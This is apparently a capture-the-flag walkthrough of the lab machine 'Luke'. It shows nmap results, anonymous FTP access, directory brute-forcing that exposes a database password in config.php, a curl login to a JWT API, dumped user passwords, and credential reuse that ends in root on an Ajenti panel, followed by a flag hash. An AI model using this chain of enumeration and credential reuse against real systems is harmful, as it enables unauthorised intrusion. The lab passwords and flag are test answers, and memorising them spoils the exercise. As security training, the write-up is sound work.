PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp   open  ssh?
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti

FTP, SSH, HTTP and two unusual ports are open.

Port 3000 is something that looks like an API.

Port 8000 is an Ajenti CMS; brute-forcing it with common passwords fails.

FTP allows anonymous login.

It holds webapp/for_Chihiro.txt:

Dear Chihiro !!

As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of
the actual website I've created.
Normally you should know where to look but hurry up because I will delete them soon because of our security policies!

Derry

Dirbuster against port 80 turns up database login credentials:

http://10.10.10.137/config.php

$dbHost = 'localhost';
$dbUsername = 'root';
$dbPassword = 'Zk6heYCyv6ZE9Xcg';
$db = "login";
$conn = new mysqli($dbHost, $dbUsername, $dbPassword, $db) or die("Connect failed: %s\n" . $conn->error);

It also finds an entry point that requires credentials:

http://10.10.10.137/management

Trying them shows that these credentials do not work at that entry point.

Dirbuster on port 3000 finds /login, /user and similar endpoints; each of them returns the error "Auth token is not supplied", so this is probably an API that requires logging in before it returns any data.

Googling the error message suggests the API is JWT-based:

https://medium.com/dev-bits/a-guide-for-adding-jwt-token-based-authentication-to-your-single-page-nodejs-applications-c403f7cf04f4

After reading the interface description in the article above, authentication succeeds using that request format together with the credentials found in config.php.

curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg", "username":"admin"}' http://10.10.10.137:3000/login

Authentication succeeded.

Enumerating the database reveals 3 sets of user credentials:

{"name":"Admin","password":"WX5b7)>/rp$U)FW"}
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
{"name":"Yuri","password":"bet@tester87"}
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}

The Derry credentials successfully open the management entry point that required authentication earlier.

config.json there contains yet another password:

"password": "KpMasng6S5EtTy9Z"

With it, logging in to the CMS on port 8000 as the root user succeeds.

8448343028fadde1e2a1b0a44d01e650